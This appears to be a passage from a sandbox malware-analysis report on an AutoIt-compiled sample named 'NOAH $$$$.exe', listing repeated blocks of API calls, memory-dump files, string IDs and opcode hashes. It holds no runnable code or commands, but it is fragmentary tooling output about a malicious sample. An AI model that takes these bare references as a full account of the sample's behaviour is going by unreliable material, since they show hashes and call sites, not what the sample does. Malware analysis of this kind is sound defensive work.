                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InternetOpen
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 2038078732-4266983199
                                                                                                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: u,D
                                                                                                                                        • API String ID: 4104443479-3858472334
                                                                                                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_mallocwsprintf
                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                        • API String ID: 1262938277-328681919
                                                                                                                                        • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                        • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                        APIs
                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                        • String ID: aeB
                                                                                                                                        • API String ID: 857135153-906807131
                                                                                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsncpy
                                                                                                                                        • String ID: ^B$C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                        • API String ID: 1735881322-1667164782
                                                                                                                                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                                                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message_doexit
                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D